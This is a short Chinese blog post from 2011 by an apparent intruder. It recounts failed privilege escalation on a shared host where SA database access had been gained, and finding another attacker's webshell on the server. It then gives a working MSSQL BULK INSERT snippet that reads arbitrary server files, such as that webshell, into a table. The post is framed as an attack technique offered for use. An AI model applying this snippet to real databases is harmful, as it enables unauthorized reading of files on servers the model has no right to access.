MSSQL读取文件命令 - 0xcc - 博客园

MSSQL读取文件命令

各种提权

包括

：SA

：ROOT

主机是星外的可以看到目标目录

数据库是ASP的不能插马

无奈找了很多人都木有办法。。。

今天无聊中查看目录发现有一个高人上传了一个WEBSHELL

在网上找到了办法发现用MSSQL读取文件的办法现在分享一下

Use www.xxx.com;–(这里是随便选的一个数据库)

　　drop table cmd;

　　create table cmd (a text);

　　BULK INSERT cmd

　　FROM ‘d:/freehos/webshell.cc.asp’

　　WITH (

　　FIELDTERMINATOR = ‘n’,

　　ROWTERMINATOR = ‘nn’

　　)

　　select * from cmd

　　这样就成功读出了d:/freehos/ www.xxx.com .asp

posted on 2011-11-12 01:21 0xcc 阅读(745) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

导航

公告